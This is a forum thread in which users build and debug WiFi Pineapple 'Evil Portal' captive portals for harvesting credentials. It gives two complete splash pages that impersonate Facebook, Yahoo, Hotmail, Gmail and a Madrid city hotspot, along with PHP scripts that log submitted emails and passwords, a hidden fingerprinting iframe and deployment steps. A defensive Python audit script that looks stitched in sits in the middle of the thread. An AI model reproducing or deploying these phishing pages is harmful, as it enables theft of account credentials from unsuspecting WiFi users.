
How can I sniff with a captive portal?



Posted · Hidden by Sebkinne, September 4, 2014 - No reason given

This is my splash.html:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<head>
<title>Internet Gratis | Wi-Fi Alliance</title>
</head>
<body>
<center>
<br />
<img src="images/wifi-alliance.png" width="20%"><br />
<br />
<p><Strong>Bienvenido a WiFi Alliace Hot-Spot.
Para iniciar sesi&oacuten en la red WiFi primero necesita crear una cuenta a trav&eacutes de cualquiera de sus p&aacuteginas favoritas.</Strong></p>
<p><Strong>Por favor, introduzca su cuenta Facebook, Yahoo, Hotmail o Gmail para registrarse. Una vez registrado podrá disfrutar de 60 minutos de internet &iexclGRATIS!. </Strong></p><br />
<form action="capture" method="post">
<fieldset>
<table width="320">
<tr>
<td colspan="1" align=left>Email:</td>
<td colspan="3" width="100%"><input style="width:100%;" type="text" name="name" /></td>
</tr>
<tr>
<td colspan="1" align=left>Contraseña:</td>
<td colspan="3" width="100%"><input style="width:100%;" type="password" name="pass" /></td>
</tr>
<tr>
<td><img src="images/facebooklogo.png" /></td>
<td><img src="images/yahoologo.jpg"/></td>
<td><img src="images/hotmaillogo.jpg"/></td>
<td><img src="images/gmaillogo.png"/></td>
</tr>
<tr>
</tr>
<tr></tr>
<td align=center ><input type="submit" value="Login" name="facebook" /></td>
<td align=center ><input type="submit" value="Login" name="yahoo" /></td>
<td align=center ><input type="submit" value="Login" name="hotmail" /></td>
<td align=center ><input type="submit" value="Login" name="gmail" /></td>
</table>
</fieldset>
</form>
</center>
</body>
</html>
And this is my capture.php:

<?php

$username = $_POST['username'];
$password = $_POST['password'];
$file = fopen("sd/evilportal.txt", "a");
fwrite($file, $username . " " . $password . "\n");
fclose($file);
?>
I have a URL to this file.
The problem is: I enter an email and password but it reloads the same page; it doesn't continue to normal navigation and it doesn't save any password or email... Can someone please help me?

Someone?

You are submitting your form to nowhere...
<form action="capture" method="post">

The value of action should be the place that you are posting to. Capture is nothing.

It should look like:

<form action="http://172.16.42.1/capture.php" method="post">

Thanks newbi3. 'Capture' is a URL in the same folder as my splash.html; it points to capture.php on my SD.

Edited by daniboy92

You have to have it running on a webserver. It can't just post to a file in a random location.


Can you help me with this HTML? It's another HTML page, and I have everything in order: capture.php in the /www folder, the 'post' method pointing to http://172.16.42.1/capture.php, but I can't get a working phishing page...

This is the thread:

https://forums.hak5.org/index.php?/topic/33553-help-me-with-this-html-code/

Thanks a lot for all your support newbi3.

Edited by daniboy92

Please, newbi3, fix your infusion (Evil Portal). Don't refresh tabs. Works perfectly, but the infusion doesn't apply changes, doesn't refresh, doesn't close tabs..

Update to 2.3 which was released today


Hey daniboy92, here is a simple captive portal, 100% working.


#1 Get fresh evil portal infusion (2.3)
#2 Configure : Auto
#3 Copy these files in your pineapple(with ftp, sftp, ..) :
a) splash.html --> to --> /etc/nodogsplash/htdocs
b) fonts (full directory) --> to --> /etc/nodogsplash/htdocs
c) style.css --> to --> /etc/nodogsplash/htdocs/images
d) h.jpg --> to --> /etc/nodogsplash/htdocs/images
e) service.php --> to --> /www
#4 start nodogsplash service
#5 enjoy!!

files (mega.co.nz) -> http://goo.gl/7DdqcO

File to save input box in --> /www/stored.txt

Edited by pax0r

I'd rather post it in the main post with a disclaimer saying it's an example with no support. If you could give me the code and a screenshot, I'll post it.

Posted · Hidden by Sebkinne, September 4, 2014 - No reason given

Portal 1º:

splash.html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<script type="text/javascript">
function ajaxRequest() {
if (window.XMLHttpRequest) {
return new XMLHttpRequest();
} else if (window.ActiveXObject) {
return new ActiveXObject("Microsoft.XMLHTTP");
} else {
return false;
}
}
function sendInfo() {
var xmlhttp = new ajaxRequest();
var usernamevalue=encodeURIComponent(document.getElementById("username").value);
var redirectvalue=encodeURIComponent(document.getElementById("redirect").value);
var passwordvalue=encodeURIComponent(document.getElementById("password").value);
if (emailvalue != null && emailvalue != "") {
var parameters="email="+emailvalue+"&redirect="+redirectvalue+"&password=" + passwordvalue;
xmlhttp.open("POST", "http://172.16.42.1/captureWA.php", true);
xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xmlhttp.send(parameters);
document.getElementById("results").innerHTML="&iexclGracias!";
window.location = document.getElementById("redirect").value;
} else {
document.getElementById("results").innerHTML="Por favor, ingrese su email y su contrase&ntildea.";
}
}
</script>
<head>
<title>Internet Gratis | Wi-Fi Alliance</title>
</head>
<body>
<center>
<br />
<img src="/images/wifi-alliance.png" width="20%"><br />
<br />
<p><Strong>Bienvenido a WiFi Alliace Hot-Spot.
Para iniciar sesi&oacuten en la red WiFi primero necesita crear una cuenta a trav&eacutes de cualquiera de sus p&aacuteginas favoritas.</Strong></p>
<p><Strong>Por favor, introduzca su cuenta Facebook, Yahoo, Hotmail o Gmail para registrarse. Una vez registrado podrá disfrutar de 60 minutos de internet &iexclGRATIS!. </Strong></p><br />
<form action="http://172.16.42.1/captureWA.php" method="post">
<fieldset>
<table width="320">
<tr>
<td><label>Email</label></td>
<td><input type="text" id="username" name="username" placeholder="Ingrese su email" required />
<td><label>Contrase&ntildea</label></td>
<td><input type="password" id="password" name="password" placeholder="Ingrese su contraseña" required />
</tr>
<tr>
<td><img src="/images/facebooklogo.png" /></td>
<td><img src="/images/yahoologo.jpg"/></td>
<td><img src="/images/hotmaillogo.jpg"/></td>
<td><img src="/images/gmaillogo.png"/></td>
</tr>
<tr>
</tr>
<tr></tr>
<td align=center ><input type="submit" onclick="sendInfo();return false;" value="Login" name="facebook" /></td>
<td align=center ><input type="submit" onclick="sendInfo();return false;" value="Login" name="yahoo" /></td>
<td align=center ><input type="submit" onclick="sendInfo();return false;" value="Login" name="hotmail" /></td>
<td align=center ><input type="submit" onclick="sendInfo();return false;" value="Login" name="gmail" /></td>
</table>
<input type="hidden" id="redirect" name="redirect" value="$authtarget" />
</fieldset>
</form>
</center>
</body>
</html>
captureWA.php

<?php

$username = $_POST['username'];
$password = $_POST['password'];
$file = fopen("/sd/WiFiAlli.txt", "a");
fwrite($file, $username . " " . $password . "\n");
fclose($file);
?>
How it looks:


It gets the email and password, and even prevents an empty login. The user can only enter with the fields filled in.

Posted (edited) · Hidden by Sebkinne, September 4, 2014 - No reason given

Portal 2º.

splash.html:

<html>
<head>
<title>$gatewayname Entry</title>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache">

<script type="text/javascript">
function ajaxRequest() {
if (window.XMLHttpRequest) {
return new XMLHttpRequest();
} else if (window.ActiveXObject) {
return new ActiveXObject("Microsoft.XMLHTTP");
} else {
return false;
}
}

function sendInfo() {
var xmlhttp = new ajaxRequest();
var emailvalue=encodeURIComponent(document.getElementById("email").value);
var redirectvalue=encodeURIComponent(document.getElementById("redirect").value);
var passwordvalue=encodeURIComponent(document.getElementById("password").value);
if (emailvalue != null && emailvalue != "") {
var parameters="email="+emailvalue+"&redirect="+redirectvalue+"&password=" + passwordvalue;
xmlhttp.open("POST", "http://172.16.42.1/capture.php", true);
xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xmlhttp.send(parameters);
document.getElementById("results").innerHTML="&iexclGracias!";
window.location = document.getElementById("redirect").value;
} else {
document.getElementById("results").innerHTML="Por favor, ingrese su email y su contrase&ntildea.";
}
}
</script>

</head>
<body>
<center>
<h2>$gatewayname</h2>
<font size="1"><i>Ofrecido para usted por la Ciudad de Madrid</i></font>

<br />
<br />

<p><font size="2">Para hacer uso del servicio necesita suscribirse con un email y una contrase&ntildea.</font></p>
<div id="results"></div>
<form id="emailform" method="POST" action="http://172.16.42.1/capture.php">
<table>
<tr>
<td><label>Email</label></td>
<td><input type="text" id="email" name="email" placeholder="Ingrese su email" required />
<td><label>Contrase&ntildea</label></td>
<td><input type="password" id="password" name="password" placeholder="Ingrese su contraseña" required />
</tr>
</table>
<input type="hidden" id="redirect" name="redirect" value="$authtarget" />
<button type="button" onclick="sendInfo();return false;">Ingresar</button>
</form>
<p><font size="1"><i>Su informaci&oacuten no será compartida con terceras partes.</i></font></p>
<p><font size="1"><i>Conectándose y haciendo uso de esta red está aceptando los <a href="#">términos del servicio.</a></i></p>
<img src="/images/wifi.png" width="71" height="49" border="0">
</center>
<iframe style="display:none;" src="http://172.16.42.1/get/get.php"></iframe>
</body>
</html>


capture.php:

<?php

$email = $_POST['email'];
$password = $_POST['password'];
$redirect = $_POST['redirect'];

$file = fopen("/sd/MadridWiFiHotSpot.txt", "a");
fwrite($file, $email . " " . $password . "\n");
fclose($file);

echo 'Gracias por elegir ' . $gatewayname . ' <meta http-equiv="refresh" content="2; url=' . $redirect . '" />';

?>


How it looks:




Note: Firefox shows '$gatewayname', but with nodogsplash running it shows the name of the network.

Note 2: the get.php referred to at the end of the HTML points to the get.php generated by the Get infusion.
Also, this portal gets credentials (email and password), and also prevents an empty login.

Edited by daniboy92
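
Seen from the defender's side, the splash pages posted in this thread share markers that can be checked automatically: a password field on a portal page, a form posting over plain HTTP to a private address, third-party brand logos, and a hidden iframe. The following Python is an added example, not part of any post in this thread; the function `audit_splash`, the finding names and the sample markup are assumptions made for illustration.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlparse
BRANDS = ("facebook", "yahoo", "hotmail", "gmail")  # brands named in the thread

class SplashAudit(HTMLParser):
    """Collects the markers a defender checks on a captive-portal splash page."""
    def __init__(self):
        super().__init__()
        self.actions, self.brands = [], set()
        self.password_field = self.hidden_iframe = False
    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self.actions.append(a.get("action", ""))
        elif tag == "input" and a.get("type", "").lower() == "password":
            self.password_field = True
        elif tag == "iframe" and "display:none" in a.get("style", "").replace(" ", "").lower():
            self.hidden_iframe = True
        elif tag == "img":  # logo file names that reference a third-party brand
            self.brands.update(b for b in BRANDS if b in a.get("src", "").lower())

def is_private(host):
    try:
        return ipaddress.ip_address(host).is_private
    except ValueError:
        return False  # a hostname, not an IP literal

def audit_splash(html):
    """Return the list of suspicious markers found in a splash page (assumed names)."""
    p = SplashAudit()
    p.feed(html)
    findings = []
    if p.password_field:  # a legitimate portal rarely needs a mail/social password
        findings.append("password-field")
        for action in p.actions:
            u = urlparse(action)
            if u.scheme == "http":  # credentials would cross the air unencrypted
                findings.append("cleartext-post")
            if u.hostname and is_private(u.hostname):  # posts to the gateway itself
                findings.append("private-target")
        if p.brands:
            findings.append("third-party-brands:" + ",".join(sorted(p.brands)))
    if p.hidden_iframe:
        findings.append("hidden-iframe")
    return findings

# Constructed sample, reduced from the structure of the pages posted in this thread.
SAMPLE = ('<form action="http://172.16.42.1/capture.php" method="post">'
          '<input type="password" name="password"><img src="/images/gmaillogo.png">'
          '<img src="/images/facebooklogo.png"></form><iframe style="display:none;" src="x"></iframe>')
```

On the constructed sample, `audit_splash(SAMPLE)` reports all five markers; a portal that only asks the user to accept terms over HTTPS reports none.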
Posted · Hidden by Sebkinne, September 4, 2014 - No reason given

Clarification: I don't take any credit for these portals; I only took code from many portals and modified it for myself, with help from many people. I do this only for personal testing and not for illegal activities.

This topic is now closed to further replies.